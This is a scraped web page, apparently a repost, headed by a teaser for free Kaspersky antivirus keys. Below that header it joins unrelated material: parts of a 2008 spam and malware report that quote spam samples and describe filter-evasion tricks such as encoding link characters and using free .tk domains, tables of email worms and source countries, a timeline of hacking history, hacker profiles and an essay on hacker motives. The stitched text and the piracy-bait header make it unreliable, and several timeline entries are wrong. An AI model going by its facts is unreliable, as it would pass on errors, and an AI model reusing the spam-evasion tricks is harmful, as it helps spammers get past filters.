Kaspersky 6 Key do 11_03_2010 Besplatno

Kaspersky 7 Key Besplatno

spetsial'no dlya ХХХХХХХХХХХХХХХ na {site}

If earlier spammers offered the option of unsubscribing from unsolicited mailings, the latest trick is the option of unsubscribing by phone. This method is hardly likely to eradicate spam, and if anything will ensure it continues: by phoning, a user is merely confirming an email account is active and ensures that the address remains in illegitimate mailing databases.

We help you to launch your business

Legal company “Consultant” offers the following types of legal services:

Registration of LLC, CJSC, OJSC
Registration of individual business
Registration of equity issue
Legal addresses
Registration of non-commercial organizations
Amendments to constitutive documents
Copies of extracts from the Uniform State Register of Enterprises and Organizations
Consultation on stockholder rights
On demand drafts of constitutive documents
Holding of stockholder meetings
Corporate disputes
Major transaction support
Legal entity dissolution
Bookkeeping assistance
Drafting and expertise of all types of civil documents
Special offer: preparation of documents to be presented in internal revenue service – 1500 rub.

Discount for complex order!

Contact information (495) 951-32-05 783-72-66

If you opened this e-mail, you may need legal advice. If you opened this e-mail by chance and you do not need any legal assistance, please, delete this message. You can unsubscribe from mass mailings by calling 951-32-05 and stating your e-mail address.

Spammer methods and tricks
In order to bypass filtration systems, spammers are willing to modify texts to such an extent that they become unreadable. The flow of spam in April was marked by a wave of messages containing heavily disguised telephone numbers. As seen from the example below, the figures are interspersed with letters, which change from message to message. This method did not gain popularity, however, because only those really interested in the topic would be patient enough to work out the exact telephone number. By the end of the month the technique had already disappeared from the flow of spam.

Английский язык.

Уроки с автором методики

Вы сможете даже думать на английском языке (правда, если будете к этому серьезно относиться) Поймете грамматику. Не думайте, что у вас «тяжелый случай». Начните заниматься. Преподаватель может выехать к вам.

Один академический час стоит – 90$ (45 минут) У вас есть возможность получить бесплатную консультацию. (495) xxx-xx-xx

Translation:

English.

Lessons with methodologist

You can even think in English (if you really make an effort) Understand grammar. No need to think you’re a hopeless case! Start learning. A teacher can come to you. One academic hour costs $90 (45 minutes) You can get a free consultation.

(495) xxx-xx-xx

One new method of obfuscating text is to replace random letters in links with special UTF codes. Each letter in the UTF code corresponds to a certain set of symbols. When sending messages containing one and the same link, spammers replace different letters with codes in each individual message. Because spam filters work with the original message, they do not recognize the link and, subsequently, that the messages belong to the same mass mailing. A mail client then coverts the codes into the corresponding letters meaning the user never notices any of the changes made.

How the original message looks

Summer is coming and it will soon be time to head to the beach.

It’s the perfect time to lose those extra kilos. How are you going to do it? I, personally, am not going to go on a diet or start exercising. There is an easier and quicker method for lazy people like you and me. Check out this site for information and photos http://e%73g%78uvj.info

The message that the recipient sees

Summer is coming and it will soon be time to head to the beach.

It’s the perfect time to lose those extra kilos. How are you going to do it? I, personally, am not going to go on a diet or start exercising. There is an easier and quicker method for lazy people like you and me. Check out this site for information and photos http://esgxuvj.info/

Russian-language mailings advertising sites in the .tk domain zone, which belongs to Tokelau, have resumed. Spammers use this free registration zone to create a large number of duplicate pages, thus increasing the chances of evading anti-spam systems.

любви для тебя больше нет. Умерла она, твоя любовь. А вместо нее дадена тебе соляные фактории, а по берегам темных, глубоких речек, по большей части http://KNEWMYNAME.TK

Приезжали посмотреть на наши чудеса из столиц и иных краев, хотели и в черную дыру, смотревшую ему прямо в переносицу. Сухо щелкнул курок, потом http://KIRKUSH.TK

Two links that lead to the same Russian-language site selling DVDs of popular films which have been re-dubbed with humorous voiceovers.

April once again saw spammers sending pictures that contained text positioned at various angles (see below), which was meant to prevent such images from being detected.

In a variation of this technique, spammers also sent several mass mailings containing pictures with handwritten text in an attempt to bypass spam detectors.

An image with a handwritten message offering an SMS message service that allows the sender’s number to be masked, making the message look as though it is from another number.

In the first instance it is easy to read the text of the message, though the second picture may pose problems not only for spam filters but also those not used to reading handwriting.

Conclusion
With the approach of the summer holiday season, the amount of spam in mail traffic is declining, and the trend looks set to continue into the summer. However, the fact that spammers are continuing to search for new technologies that bypass anti-spam filters suggests that it will only be a seasonal decline. Moreover, the criminal element in spam is becoming more prevalent, which in turn attracts those who want to profit illegally and further contributes to the criminalization of spam. Unfortunately, the chances of spammers calling a “ceasefire” or “capitulating” in the war on spam are highly unlikely.

Recent trends
The amount of spam in mail traffic fell compared to March’s (http://www.viruslist.com/en/analysis?pubid=204792004) figure and averaged 86.2%.
0.76% of messages contained malicious files and links to infected web sites.
1.3% of messages contained links to phishing sites.
The amount of spam containing graphical attachments fell considerably compared to March’s figure and accounted for just 13% of spam.
The amount of unsolicited mass mailings containing offers to pay for services via SMS messages increased.
Spammers used special codes to mask messages.
Spam containing links to advertising sites in the .tk domain zone resumed

Top 20 Viruses for April 2008

Position Change in position Name Proactive Detection Flag Percentage
1. 0 Email-Worm.Win32.NetSky.q Trojan.generic 40.58
2. +1 Email-Worm.Win32.NetSky.d Trojan.generic 8.18
3. +6 Email-Worm.Win32.NetSky.y Trojan.generic 7.62
4. +3 Email-Worm.Win32.Bagle.gt Trojan.generic 6.64
5. +1 Email-Worm.Win32.Scano.gen Trojan.generic 6.47
6. +2 Email-Worm.Win32.NetSky.aa Trojan.generic 5.81
7. New! Trojan-Downloader.Win32.Agent.ica downloader 3.08
8. -5 Email-Worm.Win32.Nyxem.e Trojan.generic 3.01
9. New! Net-Worm.Win32.Mytob.x Worm.P2P.generic 2.94
10. New! Net-Worm.Win32.Mytob.r Worm.P2P.generic 2.68
11. -1 Email-Worm.Win32.Bagle.gen Trojan.generic 1.73
12. +3 Email-Worm.Win32.Scano.bn Trojan.generic 1.19
13. -2 Email-Worm.Win32.Mydoom.l Worm.P2P.generic 1.07
14. New! Net-Worm.Win32.Mytob.bk Worm.P2P.generic 0.91
15. -13 Email-Worm.Win32.Mydoom.m Trojan.generic 0.89
16. +1 Email-Worm.Win32.NetSky.c Trojan.generic 0.70
17. Return Net-Worm.Win32.Mytob.c Trojan.generic 0.69
18. 0 Email-Worm.Win32.NetSky.t Trojan.generic 0.62
19. New! Email-Worm.Win32.Bagle.dx Trojan.generic 0.47
20. New! Email-Worm.Win32.NetSky.ac Trojan.generic 0.47
Other Malicious Programs 4.06

In April 2008, malicious code in mail traffic underwent significant changes in comparison to the previous month. Net-Womr.Win32.Mytob.t and Email-Worm.Win32.Mydoom.m, which had been pushing their way to the top by jumping ten places last month suddenly appeared to run out of steam: one slid back down the rankings, while the other disappeared off the bottom of the table altogether. At the same time, new malicious programs appeared in the Top Twenty, something which didn't happen in March.

The most recent mass mailing of the Diehard Trojan took place in February, and it seems that the authors are taking a break from spreading their creation widely. Our suppositions in March that this Trojan might end up lying low, rather than actively attacking, seem to be borne out by the absence of the program from this month's Top Twenty.

Once again, it's worms that have been around for some time which are out in full strength, with a range of modifications of Email-Worm.Win32.Netsky taking up seven out of twenty places in the rankings. This could be seen as a certain measure of success for the virus writers, especially if you consider that these modifications made up almost 64% of all infected mail traffic in April.

Trojan-Downloader.Win32.Small.hsl, which appeared in February and which rose to fifth place, has disappeared, being replaced by Trojan-Downloader.Win32.Agent.ica. However, the displacement of one Trojan-Downloader program by another is mere coincidence: the two programs have nothing in common, being constructed in completely different ways and created using different versions of Microsoft Visual Studio.

Neither Zhelatin (a.k.a. the Storm Worm) nor Warezov, which vanished from the rankings in February, have returned. It seems their authors may have decided against spreading their creations by using email attachments.

Overall, the picture created by the April 2008 statistics once again confirms the fact that new malicious programs are not being sent as attachments to emails. This tried and tested method, which is very resource intensive (at least when carrying out the initial mass mailing) is mainly used by the veteran malicious programs – those with email worm functionality. It's only rarely that we see Trojan-Downloader programs that put in a brief appearance in the Top Twenty; this is probably the result of mass mailings being conducted by malicious users who are new to the scene.

Overall, malicious programs made up 0.95% of all mail traffic scanned by Kaspersky Lab systems in April 2008. Other malicious programs made up a certain percentage (4.06%) of all malicious code found in mail traffic, indicating that a number of other worms and Trojans are currently in active circulation.

The Top Twenty countries which acted as sources of infected emails in March are shown below:

Position Change Country Percentage
1 0 the US 18.50
2 +2 Korea, Republic of 9.99
3 +4 Spain 8.12
4 -2 China 5.30
5 +7 Poland 5.11
6 +3 France 4.99
7 +1 Brazil 4.28
8 -2 Germany 3.98
9 -4 UK 3.47
10 0 Italy 3.05
11 New! Israil 2.31
12 -9 India 2.25
13 -2 Japan 2.07
14 New! Argentine 1.63
15 0 Turkey 1.36
16 -2 Australia 1.16
17 +2 Netherlands 1.14
18 New! Rumania 1.11
19 -2 Canada 1.06
20 -7 Russia 0.97
Other countries 18.15

Summary:
Went up: Email-Worm.Win32.NetSky.d, Email-Worm.Win32.NetSky.y, Email-Worm.Win32.Bagle.gt, Email-Worm.Win32.Scano.gen, Email-Worm.Win32.NetSky.aa, Email-Worm.Win32.Scano.bn, Email-Worm.Win32.NetSky.c
Went down: Email-Worm.Win32.Nyxem.e, Email-Worm.Win32.Bagle.gen, Email-Worm.Win32.Mydoom.l, Email-Worm.Win32.Mydoom.m,
Re-entry: Net-Worm.Win32.Mytob.c
No change: Email-Worm.Win32.NetSky.q, Email-Worm.Win32.NetSky.t

The history of Computer Viruses

2008-06-07T08:51:00.000-07:00

History of Hacking-related Events
December 1947 - William Shockley invents the transistor and demonstrates its use for the first time. The first transistor consisted of a messy collection of wires, insulators and germanium. According to a recent poll on CNN's website, the transistor is believed to be the most important discovery in the past 100 years.
1964 - Thomas Kurtz and John Kemeny create BASIC, one of the most popular programming languages even nowadays.
1965 -it's estimated that approximately 20,000 computer systems are in use in the United States. Most of these are manufactured by International Business Machines (IBM).
1968 - Intel is founded.
1969 - AMD is founded.
1969 - The Advanced Research Projects Agency (ARPA) create the ARPANET, the forerunner of the Internet. The first four nodes (networks) of ARPANET consisted of the University of California Los Angeles, University of California Santa Barbara, University of Utah and the Stanford Research Institute.
1969 - Intel announces 1K (1024 bytes) RAM modules.
1969 - Ken Thompson and Dennis Ritchies begin work on UNICS. Thompson writes the first version of UNICS in one month on a machine with 4KB of 18 bit words. UNICS is later renamed 'UNIX'.
1969 - MIT becomes home to the first computer hackers, who begin altering software and hardware to make it work better and/or faster.
1969 - Linus Torvalds born in Helsinki.
1970 - DEC introduces the PDP-11, one of the most popular computer designs ever. Some are still in use as today.
1971 - John Draper, aka as 'Cap'n Crunch' hacks phone systems using a toy whistle from a cereal box.
1971 - The first email program is released for the Arpanet. The author is Ray Tomlinson, who decides to use the '@' character to separate the user name from the domain address.
1972 - Ritchie and Kerningham rewrite UNIX in C, a programming language designed with portability in mind.
1972 - NCSA develops the 'telnet' tool.
1973 - Gordon Moore, Intel's chairman postulates the famous 'Moore Law', which states the number of transistors in CPUs will double every 18 months, a law which will stay true for more than 20 years.
1973 - FTP is introduced.
1974 - Stephen Bourne develops the first major UNIX shell, the 'bourne' shell.
1975 - Bill Gates and Paul Allen found Microsoft.
1976 - A 21-year old Bill Gates writes 'An Open Letter to Hobbyists', a document in which he condemns open source and software piracy.
April 1st, 1976 - Apple Computers is founded.
1977 - Billy Joy authors BSD, another UNIX-like operating system.
1979 - Microsoft licenses the UNIX source code from AT&T and creates their own implementation, 'Xenix'.
1981 - The Domain Name System (DNS) is created.
1981 - Microsoft acquires the intellectual property rights for DOS and renames it MS-DOS.
1982 - Sun Microsystems is founded. Sun will become famous for its SPARC microprocessors, Solaris, the Network File System (NFS) and Java.
1982 - Richard Stallman begins to develop a free version of UNIX which he calls 'GNU', a recursive definition meaning 'GNU's Not UNIX'.
1982 - William Gibson invents the term 'cyberspace'.
1982 - SMTP, the 'simple mail transfer protocol' is published. SMTP is currently the most widespread method for exchanging messages on the Internet.
1982 - Scott Fahlman invents the first emoticon, ':)'.
1983 - The Internet is founded by splitting the Arpanet into separate military and civilian networks.
1983 - FidoNet is developed by Tom Jennings. FidoNet will become the most widespread information exchange network in the world for the next 10 years, until the Internet takes over.
1983 - Kevin Poulsen, aka 'Dark Dante' is arrested for breaking into the Arpanet.
1984 - CISCO Systems is founded.
1984 - Fred Cohen develops the first PC viruses and comes up with the now-standard term 'computer virus'.
1984 - Andrew Tannenbaum creates Minix, a free UNIX clone based on a modular microkernel architecture.
1984 - Bill Landreth, aka 'The Cracker', is convicted of hacking computer systems and accessing NASA and Department of Defense computer data.
1984 - Apple introduces Macintosh System 1.0.
1985 - Richard Stallman founds the Free Software Foundation.
March 15, 1985 - 'Symbolics.com' is registered as the first Internet domain name.
November 1985 - Microsoft releases 'Windows 1.0', which sells for $100.
1986 - The Computer Fraud and Abuse Act in US adopted.
1986 - 'Legion of Doom' member Loyd Blankenship, aka 'The Mentor', is arrested and publishes the now famous 'Hacker's Manifesto'.
1988 - The CD-ROM is invented.
1988 - IRC is established.
November 1988 - Robert Morris launches an Internet worm which infects several thousand systems and clogs computers around the country due to a programming error. This worm is now knows as the Morris worm.
1989 - the WWW is developed at CERN labs, in Switzerland.
1990 - The Arpanet is dismantled.
1990 - Kevin Poulsen hacks a phone system in LA making himself the winner of a Porsche 944 in a radio phone-in.
1991 - PGP (Pretty Good Privacy), a powerful, free encryption tool is released by Philip Zimmerman. The software quickly becomes the most popular encryption package in the world.
1991 - Rumours appear regarding the computer virus 'Michaelangelo', coded to launch its destructive payload on March 6th.
September 17, 1991 - Linus Torvalds releases the first version of Linux.
1992 - The 'Masters of Deception' phone phreaking group is arrested due to evidence obtained via wiretaps.
1993 - The Mosaic web browser is released.
1993 - Microsoft releases Windows NT.
1993 - First version of FreeBSD is released.
March 23, 1994 - 16-year-old Richard Pryce, aka 'Datastream Cowboy', is arrested and charged with unauthorized computer access.
1994 - Vladimir Levin, a Russian mathematician, hacks into Citibank and steals $10 million.
1995 - Dan Farmer and Wietse Venema release SATAN, an automated vulnerability scanner, which becomes a popular hacking tool.
1995 - Chris Lamprecht, aka 'Minor Threat', is the first person to be ever banned from the Internet.
1995 - Sun launches Java, a computer programming language designed to be portable across different platforms in compiled form.
August 1995 - Microsoft Internet Explorer (IE) released. IE will become the most exploited web browser in history and a favourite target for virus writers and hackers.
August 1995 - Windows 95 is launched.
1996 - IBM releases OS/2 Warp version 4, a powerful multi-tasking operating system with a new user interface, as a counter to Microsoft's recently released Windows 95. Despite being more reliable and stable, OS/2 will slowly lose ground and be discontinued a few years later.
1996 - ICQ, the first IM, is released.
1996 - Tim Lloyd plants a software time bomb at Omega Engineering, a company in New Jersey. The results of the attack are devastating: losses of USD $12 million and more than 80 employees lose their jobs. Lloyd is sentenced to 41 months in jail.
1997 - DVD format specifications published.
1998 -Two Chinese hackers, Hao Jinglong and Hao Jingwen (twin brothers), are sentenced to death by a court in China for breaking into a bank's computer network and stealing 720'000 yuan ($87'000).
March 18, 1998 - Ehud Tenebaum, a prolific hacker aka 'The Analyzer', is arrested in Israel for hacking into many high profile computer networks in US.
1998 - CIH virus released. CIH was the first virus to include a payload which wipes the FLASH BIOS memory, rendering computer systems unbootable and invalidating the myth that 'viruses cannot damage hardware'.
March 26, 1999 - Melissa virus released.
2000 - A Canadian teenage hacker known as 'Mafiaboy' conducts a DoS attack and renders Yahoo, eBay, Amazon.com, CNN and a few other web sites inaccessible. He is later sentenced to eight months in a youth detention center.
2000 - Microsoft Corporation admits its computer network was breached and the code for several upcoming versions of Windows were stolen.
2000 - FBI arrests two Russian hackers, Alexei V. Ivanov and Vasiliy Gorshkov. The arrests took place after a long and complex operation which involved bringing the hackers to the US for a 'hacking skills demonstration'.
July 2001 - CodeRed worm released. It spreads quickly around the world, infecting a hundred thousand computers in a matter of hours.
2001 - Microsoft releases Windows XP.
July 18th, 2002 - Bill Gates announces the 'Trustworthy Computing' initiative, a new direction in Microsoft's software development strategy aimed at increasing security.
October 2002 - A massive attack against 13 root domain servers of the Internet is launched by unidentified hackers. The aim: to stop the domain name resolution service around the net.
2003 - Microsoft releases Windows Server 2003.
April 29th, 2003 - New Scotland Yard arrest Lynn Htun at a London's InfoSecurity Europe 2003 computer fair. Lynn Htun is believed to have gained unauthorized access to many major computer systems such as Symantec and SecurityFocus.
November 6th, 2003 - Microsoft announces a USD 5 million reward fund. The money will be given to those who help track down hackers targeting the software giant's applications.
May 7th, 2004 - Sven Jaschan, the author of the Netsky and Sasser Internet worms, is arrested in northern Germany.
September 2004 - IBM presents a supercomputer which is the fastest machine in the world. Its sustained speed is 36 trillion operations per second.

Major Hackers Personalities
This section contains brief information on some of the most famous hackers, both black and white hats. The individuals below are well known for a variety of reasons: their actions, whether good or bad, their contributions to software and technology development, or their innovative approach, skills and ability to think out of the box.

Richard Stallman is known as the father of free software. When Stallman started working at MIT's Artificial Intelligence Lab in 1971 he was confronted with 'non disclosure agreements' and closed program sources while he was hacking and improving system drivers the 'traditional way'. After an interesting battle to obtain the source code of a faulty printer utility, Stallman gave up his job and became the loudest advocate for free computer software, creating GNU and the Free Software Foundation in the process.

Dennis Ritchie and Ken Thompson are famous for two major software developments of the 20th century: the UNIX operating system and the C programming language. These two began their carriers at Bell Labs in 1960's, revolutionising the computer world forever with their ideas. While Ken Thompson has retired from the computer world, Dennis Ritchie is still employed at Lucent Technology, working on a new operating system derived from Unix, called 'Plan9'.

John Draper, aka 'Cap'n Crunch' is famous for his ability to hack phone systems using nothing but a whistle from the 'Cap'n Crunch' cereal boxes (hence the nickname). Besides being the father of 'phone phreaking', John Draper is also famous for writing what was perhaps the first IBM PC word processor. He now heads his own security venture, developing antispam solutions, thwarting hacker attacks and securing PCs.

Robert Morris is famous for creating the first Internet worm in 1988. It infected thousand of systems, and practically brought the Internet to a halt for nearly a day. The 'Morris Worm' was perhaps the first fully automated hacking tool, exploiting a couple of unpatched vulnerabilities on Vax and Sun computers.

Kevin Mitnick, possibly the best known case of a 'black hat', was caught by the computer expert Tsutomu Shimomura back in 1995.

Kevin Poulsen remains famous for his 1990 hack of the phone system in Los Angeles. This enabled him to become the 102nd caller in a radio-phone and win a Porsche 944. Kevin Poulsen was eventually caught and imprisoned for three years. He now works as a columnist for the online security magazine 'SecurityFocus'.

Vladimir Levin, a Russian computer expert, hacked into Citibank and extracted USD $10 million. He was arrested by Interpol in UK, back in 1995 and sentenced to three years in prison, as well as being required to pay USD $240,015 in restitution.

Tsutomu Shimomura is a good example of a 'white hat'. He was working for the San Diego Supercomputing Center when Kevin Mitnick broke into his network and stole information on cellular technology and other classified data. Tsutomu started the pursuit for Mitnick which eventually led to his arrest.

Linus Torvalds is known as the father of Linux, the most popular Unix-based operating system in use nowadays. Linus started his work on a new operating system in 1991, adopting several controversial technologies for his project, namely the concept of Free Software and GNU's Public License system. He is also known for his early disputes with Andrew Tannenbaum, the author of Minix, which was the inspirational source for Linus' OS project.

Hackers and Law
Given that computer hacking is at least three decades old, there has been plenty of time for governments to develop and approve cybercrime laws. At the moment, almost all developed countries have some form of anti-hacking law or legislation on data theft or corruption which can be used to prosecute cyber criminals. There are efforts to make these laws even more stringent, which sometimes raise protests from groups which support the right to freedom of information.

Over the past few years, there have been lots of convictions for hacking and unauthorized data access. Here are a few of them:

Kevin Mitnick is probably the one of the most famous hacker takedown cases. Mitnick was arrested by the FBI in Raleigh, North Carolina, on February 15th, 1995, after the computer expert Tsutomu Shimomura managed to track him to his hideout. After pleading guilty to most of the charges brought against him, Mitnick was sentenced to 46 months in prison and three years probation. He was additionally sentenced to another twenty-two months for probation violation and additional charges. He was eventually released from prison on January 21, 2000.
Pierre-Guy Lavoie, a 22-year-old Canadian hacker, was sentenced to 12 months of community service and placed on probation for 12 months for fraudulently using computer passwords to perpetrate computer crimes. He was sentenced under Canadian law.
Thomas Michael Whitehead, 38, of Boca Raton, Florida, was the first person to be found guilty under the Digital Millennium Copyright Act (DMCA). He was prosecuted as part of the Attorney General's Computer Hacking and Intellectual Property program and charged with selling hardware which could be used to illegally receive DirecTV satellite broadcasts.
Serge Humpich, a 36 year-old engineer, was sentenced to a suspended prison sentence of 10 months by a ruling issued by the 13th correctional chamber. He also had to pay 12,000 francs (approx. €1,200) in fines, and symbolic damages of one franc to the 'Groupement des Cartes Bancaires'.
On October 10, 2001, Vasiliy Gorshkov, age 26, of Chelyabinsk, Russia, was found guilty of 20 counts of conspiracy, computer crime, and fraud committed against the Speakeasy Network of Seattle, Washington, Nara Bank of Los Angeles, California, Central National Bank of Waco, Texas; and the online payment company PayPal of Palo Alto, California.
On July 1, 2003, Oleg Zezev, aka "Alex," a Kazakhstan citizen, was sentenced in a Manhattan federal court to over four years (51 months) in prison following his conviction on extortion and computer hacking charges.
Mateias Calin, a Romanian hacker, along with five American citizens, was indicted by a federal grand jury on charges that they conspired to steal more than $10 million in computer equipment from Ingram Micro in Santa Ana, California, the largest technology distributor in the world. Mateias and his network are yet to be convicted for these crimes and face up to 90 years in prison.
The list above is simply a brief digest which illustrates how cybercrime legislation has been used across the world against hackers or to convict cybercriminals in general. There are also some cases where people have been wrongly convicted of cybercrime. There are also numerous cases where hackers are still at liberty despite their names and identities being known. However, the number of such cases is being reduced day by day.

Cybercrime is here to stay. It is a reality of the 21st century, and the wide availability of the Internet and the insecure systems which come with it have increased the reach of cybercrime. With sufficiently sophisticated legislation, and more international cybercrime treaties such as being adopted, the world is hopefully heading in the right direction, with the long term aim being a safer, more law-abiding cyberspace.

An Analysis of Hacker Mentality
Why people hack is a subject which is often discussed. Some say the explanation is the same as the one given by people who climb mountains: 'because they [computers] are out there'. Others claim that by highlighting vulnerabilities, hacking helps increase computer security. And finally, there is the explanation most often put forward: criminal intent.

Whatever the reason, as long as computers exists there will be hackers - white hats, black hats and grey hats. And because there is no way of predicting which kind of attack ('curiosity' versus 'malicious') will hit your computer first, it is always best to be prepared for the worst.

The truth is that in hours of a machine being connected to the Internet, somebody will scan it with an automated vulnerability probing tool, looking for ways to get in. It may be somebody who is just curious to see what is on the machine, or a white hat from the other side of the world checking to see if the computer is secure. Of course, in real life you wouldn't want passing strangers stopping to check if your house or car were locked, and, if not, to go inside, look around, go through your possessions and leave a note saying 'Hi, I was here, your door was open, but don't mind me and BTW, fix your lock'. If you wouldn't want someone to do this to your house, you wouldn't want someone doing it to your computer. And there is no excuse for doing it to someone else's computer either.

Premeditated, criminal, hacking is obviously even worse. In the real world, somebody walks by, breaks your lock, gets inside, disables your alarm system, steals something or plants listening devices in your phone or surveillance equipment in your living room. If this happens you call the police, they look around, write a report, and you wait for the thieves to be caught. Unfortunately, this is a rare luxury in the computer world; the culprit may be far, far way, downloading your confidential files while sitting in his personal villa or sunbathing by his huge pool, nicely built with stolen money. Or, in a business environment, many large corporations prefer not to report hacking incidents at all, in order to protect their company image. This means that the criminals remain unpunished.

Another hacker motivation may be hooliganism, or digital graffiti, which can be summed up as hacking into systems to cause damage. Web site defacement is a very popular form of digital graffiti and there are some hacking groups which focus on this task alone. Just as in the physical, non-cyber world, catching the hooligans is a tedious task which usually doesn't repay the effort or resources expended.

Whatever the reasoning, be it 'to help others', 'security heads-up!', 'hooliganism' or 'criminal intent', hacking is a phenomenon which is deeply rooted in the world of computing and will probably never die. There will always be people immature enough to abuse public resources, self-proclaimed 'Robin Hoods' and criminals hiding in the dark alleys of cyberspace.